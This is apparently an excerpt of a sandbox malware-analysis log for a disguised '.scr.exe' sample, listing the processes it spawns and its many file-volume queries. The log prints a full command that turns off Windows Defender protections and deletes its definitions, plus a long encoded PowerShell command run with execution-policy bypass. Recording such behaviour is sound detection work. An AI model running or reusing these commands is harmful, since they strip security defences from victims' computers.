hqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe Code function: 68_2_00007FF7F7ECB340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 68_2_00007FF7F7ECB340
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Code function: 0_2_00007FF73AE39E40 cpuid 0_2_00007FF73AE39E40
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\ucrtbase.dll VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\_ctypes.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\blank.aes VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\blank.aes VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\blank.aes VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\blank.aes VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\blank.aes VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\blank.aes VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI17882\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe Queries volume information: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe VolumeInformation Jump to behavior
